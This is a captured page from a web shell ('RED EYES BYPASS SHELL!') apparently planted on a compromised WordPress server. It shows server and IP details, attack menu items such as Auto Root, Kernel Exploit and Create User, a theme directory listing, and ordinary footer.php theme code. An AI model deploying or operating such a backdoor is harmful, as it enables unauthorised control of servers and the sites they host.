Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
human /
wp-content /
themes /
medihealth /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
sections
[ DIR ]
drwxr-xr-x
webfonts
[ DIR ]
drwxr-xr-x
archive.php
2.67
KB
-rwxr-xr-x
breadcrumb.php
451
B
-rwxr-xr-x
category.php
2.67
KB
-rwxr-xr-x
class-tgm-plugin-activation.php
120.18
KB
-rwxr-xr-x
comments.php
1.97
KB
-rwxr-xr-x
content-aside.php
1.77
KB
-rwxr-xr-x
content-gallery.php
1.77
KB
-rwxr-xr-x
content.php
2.39
KB
-rwxr-xr-x
custom-comments.php
2.52
KB
-rwxr-xr-x
footer.php
2.5
KB
-rwxr-xr-x
front-page.php
1.21
KB
-rwxr-xr-x
functions.php
9.71
KB
-rwxr-xr-x
header.php
5.19
KB
-rwxr-xr-x
index.php
4.45
KB
-rwxr-xr-x
page.php
4.27
KB
-rwxr-xr-x
readme.txt
7.38
KB
-rwxr-xr-x
screenshot.png
1.03
MB
-rwxr-xr-x
searchform.php
417
B
-rwxr-xr-x
sidebar-footer.php
689
B
-rwxr-xr-x
sidebar-woocommerce.php
188
B
-rwxr-xr-x
single.php
7.24
KB
-rwxr-xr-x
style.css
126.86
KB
-rwxr-xr-x
tag.php
2.62
KB
-rwxr-xr-x
woocommerce.php
828
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : footer.php
<?php //Footer Settings $footer_copyright_text = get_theme_mod('medihealth_footer_copyright_text', ''); $icon_url_1 = get_theme_mod('medihealth_contact_social_icon_url_1', ''); $icon_url_2 = get_theme_mod('medihealth_contact_social_icon_url_2', ''); $icon_url_3 = get_theme_mod('medihealth_contact_social_icon_url_3', ''); $icon_url_4 = get_theme_mod('medihealth_contact_social_icon_url_4', ''); $icon_url_5 = get_theme_mod('medihealth_contact_social_icon_url_5', ''); ?> </div><!-- site content end --> <!-- Footer Section --> <section class="footer-section"> <div class="container"> <div class="row"> <?php // Fetch MediHealth Theme Footer Widget get_template_part('sidebar','footer'); ?> </div> </div> <div class="footer_copyright"> <div class="container"> <div class="row"> <div class="col-md-9 copyright"> <p> <?php if($footer_copyright_text != "") { echo esc_html($footer_copyright_text); } else { ?> <?php echo date( 'Y' ); ?> <?php esc_html_e( '©', 'medihealth'); ?> <?php bloginfo( 'name'); ?> <?php } ?> <?php esc_html_e('- Theme MediHealth by' ,'medihealth'); ?> <?php esc_html_e('A WP Life', 'medihealth'); ?> </p> </div> <div class="col-md-3"> <div class="footer_follow"> <?php if($icon_url_1 != "" ) { ?> <a href="<?php echo esc_url($icon_url_1); ?>" class="social_icon_in icon_1"> <i class="fab fa-facebook"></i> </a> <?php } ?> <?php if($icon_url_2 != "" ) { ?> <a href="<?php echo esc_url($icon_url_2); ?>" class="social_icon_in icon_2"> <i class="fab fa-instagram"></i> </a> <?php } ?> <?php if($icon_url_3 != "" ) { ?> <a href="<?php echo esc_url($icon_url_3); ?>" class="social_icon_in icon_3"> <i class="fab fa-youtube"></i> </a> <?php } ?> <?php if($icon_url_4 != "" ) { ?> <a href="<?php echo esc_url($icon_url_4); ?>" class="social_icon_in icon_4"> <i class="fab fa-twitter"></i> </a> <?php } ?> <?php if($icon_url_5 != "" ) { ?> <a href="<?php echo esc_url($icon_url_5); ?>" class="social_icon_in icon_5"> <i class="fab fa-linkedin"></i> </a> <?php } ?> </div> </div> </div> </div> </div> </section> <!-- Footer Section --> <?php wp_footer(); ?> </body> </html>
Close